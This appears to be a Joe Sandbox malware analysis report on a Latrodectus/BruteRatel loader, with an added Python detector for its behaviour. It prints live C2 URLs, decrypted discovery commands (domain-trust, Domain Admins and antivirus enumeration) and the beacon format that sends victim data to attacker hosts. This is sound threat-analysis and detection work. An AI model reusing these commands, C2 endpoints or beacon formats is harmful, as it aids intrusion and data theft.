Windows Analysis Report
upfilles.dll.dll

Overview

General Information

Sample name: upfilles.dll.dll
(renamed file extension from exe to dll)
Original sample name: upfilles.dll.exe
Analysis ID: 1439879
MD5: ccb6d3cb020f56758622911ddd2f1fcb
SHA1: 4a013f752c2bf84ca37e418175e0d9b6f61f636d
SHA256: f4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825de
Tags: exe

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Brute Ratel C4, BruteRatel Brute Ratel is a Customized Command and Control Center for Red Team and Adversary Simulation. SMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more. Built-in debugger to detect EDR userland hooks. Ability to keep memory artifacts hidden from EDRs and AV. Direct Windows SYS calls on the fly. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
Unidentified 111 (Latrodectus), Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection

Source: 22.0.explorer.exe.13a0000.0.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://workspacin.cloud/live/", "https://illoskanawer.com/live/"]}
Source: upfilles.dll.dll ReversingLabs: Detection: 15%
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c ipconfig /all
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c systeminfo
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c nltest /domain_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c net view /all /domain
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c net view /all
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &ipconfig=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c net config workstation
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /c whoami /groups
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &systeminfo=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &domain_trusts=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &domain_trusts_all=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &net_view_all_domain=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &net_view_all=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &net_group=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &wmic=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &net_config_ws=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &net_wmic_av=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &whoami_group=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &proclist=[
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "pid":
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "%d",
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "proc":
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "%s",
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "subproc": [
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &desklinks=[
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: *.*
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: "%s"
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Update_%x
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Custom_update
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: .dll
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: .exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: runnung
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: -.V71R?b;<=>&GAg"Ovz_~zzva6WQp2
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: [8<z'Hsw)sXs[wsoVWXYZ[r;X\@hS1W{S9_<S!WUSpqrsZp
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: ;[8<H'sws]sXwsoo(?8fI/^3753hijkBhlX;1*
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: /files/
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Electrol
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: .+`lgSRHYJPpU\IETT05?=CAI
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: POST
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: GET
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: curl/7.88.1
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: p:
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: URLS
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: COMMAND
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: ERROR
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: -./012R35Q^U0R]v?z4~:z5v!YRYOIJ_
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: sZp
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: @-
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: <html>
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: <!DOCTYPE
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %s%d.dll
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: 12345
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &stiller=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %s%d.exe
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: LogonTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %x%x
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: TimeTrigger
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: PT0H%02dM
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &mac=
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %02x
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: :%02x
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: PT0S
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &computername=%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: &domain=%s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: \*.dll
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: @ACDEGwIuKMNOPQRSTUx1^ZR=/m=m6U0U:],]'U%U*-s-~5V5P=W=Z5Y5V-s
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: https://workspacin.cloud/live/
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: https://illoskanawer.com/live/
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: AppData
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Desktop
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Startup
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Personal
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Local AppData
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.0.explorer.exe.13a0000.0.unpack String decryptor: \update_data.dat
Source: unknown HTTPS traffic detected: 91.194.11.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 138.124.183.215:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.175.181.104:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.164.68.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.155:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.69.236.35:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: Binary string: X:\Gitlab\Builds\e945be61\0\lab\protectionplatform\Output\Release\x64\eppcom64.pdb source: rundll32.exe, 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000A.00000002.1803925725.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1853230060.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1842561236.0000000180025000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.2936902948.0000000180025000.00000002.00000001.01000000.00000003.sdmp, upfilles.dll.dll
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800192B8 FindFirstFileExW, 6_2_00000001800192B8
Source: C:\Windows\explorer.exe Code function: 22_2_013A8BA8 FindFirstFileW,FindNextFileW,LoadLibraryW, 22_2_013A8BA8
Source: C:\Windows\explorer.exe Code function: 22_2_013A1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 22_2_013A1A08
Source: C:\Windows\explorer.exe Code function: 22_2_013ADCE0 FindFirstFileW, 22_2_013ADCE0
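The string decryptor output above is the whole discovery chain the injected explorer.exe runs (cmd.exe /c ipconfig /all, systeminfo, nltest /domain_trusts, net view /all, net group "Domain Admins" /domain, whoami /groups, the wmic SecurityCenter2 query), and the signature list records the parent that makes it anomalous: rundll32.exe spawning explorer.exe. The following is an added example, not part of the Joe Sandbox report, showing how an analyst would turn those two observations into one host-side correlation. It models process-creation events as dicts with Sysmon Event ID 1 field names (ProcessId, ParentProcessId, Image, ParentImage, CommandLine); the events, PIDs and the min_distinct threshold are constructed assumptions, not data from the sandbox run.

```python
"""Host-side correlation for the behaviour this report records.

Added example, not part of the Joe Sandbox report. Flags (1) rundll32.exe
spawning explorer.exe, the Sigma hit in the signature list, and (2) an
explorer.exe that runs several of the discovery commands the string decryptor
recovered. Events use Sysmon Event ID 1 field names; all samples below are
constructed, and the PIDs and min_distinct threshold are assumptions.
"""
import re
from collections import defaultdict

# Discovery command lines from the string decryptor output, keyed by the
# form-field name the same output posts them under (&ipconfig=, &domain_trusts=, ...).
DISCOVERY_PATTERNS = {
    "ipconfig":      r"\bipconfig\s+/all\b",
    "systeminfo":    r"\bsysteminfo\b",
    "domain_trusts": r"\bnltest\s+/domain_trusts\b",
    "net_view_all":  r"\bnet\s+view\s+/all\b",
    "net_group":     r'\bnet\s+group\s+"Domain Admins"\s+/domain\b',
    "net_config_ws": r"\bnet\s+config\s+workstation\b",
    "whoami_group":  r"\bwhoami\s+/groups\b",
    "wmic_av":       r"SecurityCenter2.*AntiVirusProduct",
}
_COMPILED = {k: re.compile(v, re.IGNORECASE) for k, v in DISCOVERY_PATTERNS.items()}


def image_name(path):
    """Lower-cased basename of an image path: C:\\Windows\\explorer.exe -> explorer.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def discovery_key(cmdline):
    """Name of the discovery command a command line contains, or None."""
    for key, rx in _COMPILED.items():
        if rx.search(cmdline):
            return key
    return None


def rundll32_spawned_explorer(ev):
    """Sigma 'RunDLL32 Spawning Explorer': explorer.exe is started by userinit.exe
    or by an existing explorer.exe, so rundll32.exe as its parent is a strong signal."""
    return (image_name(ev["ParentImage"]) == "rundll32.exe"
            and image_name(ev["Image"]) == "explorer.exe")


def detect(events, min_distinct=3):
    """Return findings for a list of process-creation events.

    A rundll32.exe -> explorer.exe launch is reported on its own. Discovery
    commands are grouped per explorer.exe parent PID and reported once that
    parent has run at least min_distinct different ones, so a lone
    'ipconfig /all' from an interactive shell does not fire.
    """
    findings = []
    seen = defaultdict(set)  # explorer.exe PID -> discovery keys it has run
    for ev in events:
        if rundll32_spawned_explorer(ev):
            findings.append(("rundll32_spawns_explorer", ev["ProcessId"], ev["ParentProcessId"]))
            continue
        if image_name(ev["ParentImage"]) != "explorer.exe":
            continue
        if image_name(ev["Image"]) not in ("cmd.exe", "wmic.exe"):
            continue
        key = discovery_key(ev["CommandLine"])
        if key:
            seen[ev["ParentProcessId"]].add(key)
    for ppid, keys in seen.items():
        if len(keys) >= min_distinct:
            findings.append(("explorer_discovery_chain", ppid, tuple(sorted(keys))))
    return findings


def _ev(pid, ppid, parent, image, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "ParentImage": parent,
            "Image": image, "CommandLine": cmdline}


SYS32 = r"C:\Windows\System32"
EXPLORER = r"C:\Windows\explorer.exe"
CMD = SYS32 + r"\cmd.exe"

# Constructed events: one injected explorer.exe (PID 4120) running the report's
# discovery chain, plus a normal explorer.exe (PID 1500) running two harmless commands.
SAMPLE_EVENTS = [
    _ev(4120, 3188, SYS32 + r"\rundll32.exe", EXPLORER, EXPLORER),
    _ev(4200, 4120, EXPLORER, CMD, CMD + " /c ipconfig /all"),
    _ev(4204, 4120, EXPLORER, CMD, CMD + " /c systeminfo"),
    _ev(4208, 4120, EXPLORER, CMD, CMD + " /c nltest /domain_trusts"),
    _ev(4212, 4120, EXPLORER, CMD, CMD + " /c net view /all /domain"),
    _ev(4216, 4120, EXPLORER, SYS32 + r"\wbem\wmic.exe",
        r"wmic.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"),
    _ev(7001, 1500, EXPLORER, CMD, CMD + r" /c dir C:\Users"),
    _ev(7002, 1500, EXPLORER, CMD, CMD + " /c ipconfig /all"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The per-parent grouping matters more than any single pattern: each command in the chain is something an administrator might type, but the report shows the injected explorer.exe running all of them back to back and posting the output under the &ipconfig=, &systeminfo=, &domain_trusts= fields, so the count of distinct commands under one explorer.exe PID is the discriminating feature.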

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 138.124.183.215 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 3.69.236.35 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 91.194.11.183 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 54.175.181.104 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 95.164.68.73 443
Source: C:\Windows\explorer.exe Network Connect: 104.21.16.155 443
Source: Malware configuration extractor URLs: https://workspacin.cloud/live/
Source: Malware configuration extractor URLs: https://illoskanawer.com/live/
Source: Joe Sandbox View ASN Name: NASSIST-ASGI
Source: Joe Sandbox View ASN Name: NOKIA-ASFI
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: HQservCommunicationSolutionsIL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 538 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 656 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 444 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: boriz400.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: altynbe.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /content.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 248 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/azure HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 | Host: anikvan.com | Content-Length: 154 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) | Host: workspacin.cloud | Content-Length: 180 | Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: C:\Windows\explorer.exe Code function: 22_2_013A4004 InternetReadFile, 22_2_013A4004
Source: global traffic DNS traffic detected: DNS query: boriz400.com
